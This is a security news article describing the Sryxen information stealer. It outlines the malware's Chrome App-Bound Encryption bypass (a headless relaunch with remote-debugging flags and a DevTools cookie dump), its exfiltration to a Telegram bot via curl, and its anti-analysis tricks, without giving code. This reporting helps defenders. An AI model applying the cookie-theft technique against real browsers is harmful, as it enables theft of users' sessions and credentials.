A new information stealer, dubbed “Sryxen,” has emerged in the underground malware market, employing sophisticated techniques to bypass recent security enhancements in Google Chrome. This C++ based threat, sold as Malware-as-a-Service, specifically targets Windows systems, demonstrating an evolving approach to harvesting sensitive browser credentials. The malware’s innovative strategy allows it to circumvent Chrome’s App-Bound Encryption, a protection measure introduced to safeguard user data.
Sryxen operates as a rapid credential harvesting tool designed for quick deployment and immediate data exfiltration, without the need to establish persistence on an infected machine. This approach prioritizes speed and stealth. Its primary target is Chrome version 127 and newer, where Google implemented App-Bound Encryption to secure cookies and other sensitive browser information. Rather than seeking to brute-force or crack this encryption, Sryxen ingeniously leverages the browser’s own functionalities.
Sryxen’s Chrome Encryption Bypass Mechanism
The most notable feature of Sryxen is its method for stealing Chrome cookies that are protected by App-Bound Encryption. According to security researchers at DeceptIQ, when the malware detects Chrome version 127 or higher, it abandons traditional database extraction techniques. Instead, it first terminates any active Chrome processes. Following this, it re-launches Chrome with specific command-line arguments: `–headless`, `–remote-debugging-port`, and `–user-data-dir`. These flags enable remote debugging capabilities without any visible user interface, allowing the malware to operate unseen.
Once Chrome is launched in this headless, remotely debuggable state, Sryxen connects to the debugging port via a WebSocket. It then issues a DevTools Protocol command, specifically the `Network.getAllCookies` method. This command requests all cookies stored by the browser. Chrome processes this request internally, utilizing its App-Bound Encryption key to decrypt the cookie data before returning the plaintext information to the Sryxen stealer program. Crucially, these decrypted cookies do not touch the disk, rendering file-based monitoring solutions ineffective.
After successfully obtaining the decrypted cookie data, Sryxen terminates the Chrome process. It then proceeds to harvest other browser-related information, including saved passwords and cryptocurrency wallet data. Finally, it compresses all the collected sensitive information into an archive. This archive is then uploaded to a Telegram bot controlled by the attackers, typically using `curl` commands executed through PowerShell, facilitating rapid exfiltration and attacker control.
Advanced Evasion Techniques
Beyond its innovative encryption bypass, Sryxen employs multiple layers of obfuscation and anti-analysis measures to evade detection. DeceptIQ researchers identified that the malware uses Vectored Exception Handling-based code encryption. This technique keeps the main malicious payload encrypted while at rest, only decrypting it during execution through the handling of specific exceptions. This makes static analysis, where code is examined without running it, significantly more challenging, as the malicious code appears as unintelligible data.
Furthermore, Sryxen implements a suite of six distinct anti-debugging checks. These checks include inspecting the `NtGlobalFlag` value in memory and analyzing the Process Environment Block (PEB). If any debugging tools are detected during these checks, the malware is programmed to terminate its execution immediately, preventing researchers from easily analyzing its behavior in a controlled environment.
The emergence of Sryxen highlights the continuous cat-and-mouse game between malware developers and browser security teams. While Google continues to bolster its defenses, threats like Sryxen demonstrate a persistent ability to adapt and find new avenues for exploitation. Users are advised to keep their browsers and operating systems updated to the latest versions and to exercise caution regarding suspicious links and downloads, as these often serve as initial infection vectors for such information-stealing malware.